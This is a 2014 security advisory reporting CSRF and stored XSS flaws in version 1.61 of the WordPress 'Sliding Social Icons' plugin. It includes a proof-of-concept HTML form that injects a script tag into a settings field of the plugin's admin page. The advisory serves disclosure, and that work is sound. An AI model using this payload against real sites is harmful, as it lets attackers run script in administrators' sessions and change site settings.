Title: WordPress 'Sliding Social Icons' plugin - CSRF/XSS
Version: 1.61
Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/sliding-social-icons/
Notified WordPress: 2014/11/27
----------------------------------------------------------------

## Description: 
----------------------------------------------------------------
WordPress Sliding Widgets Plugin will help your to create a sliding icon list dynamically where you can place on your website. The icons slide into the screen when you hover over them. This plugin also allows you to enter a shortcode for a contact form or newsletter or any other shortcode, shows up in a sliding screen

## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and then submit the following form. 
<form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=wpbs_panel"> 
   <input type="text" name="action" value="wpbs_save_settings"><br />
  <input type="text" name="sc_social_slider_margin" value=""><script>alert(1)</script>"><br />
  <input type="text" name="sc_social_slider_save" value="Update"><br />
  <input type="submit">
</form>


## Solution
----------------------------------------------------------------
No fix available. 

The plugin has been closed by WordPress until it is updated.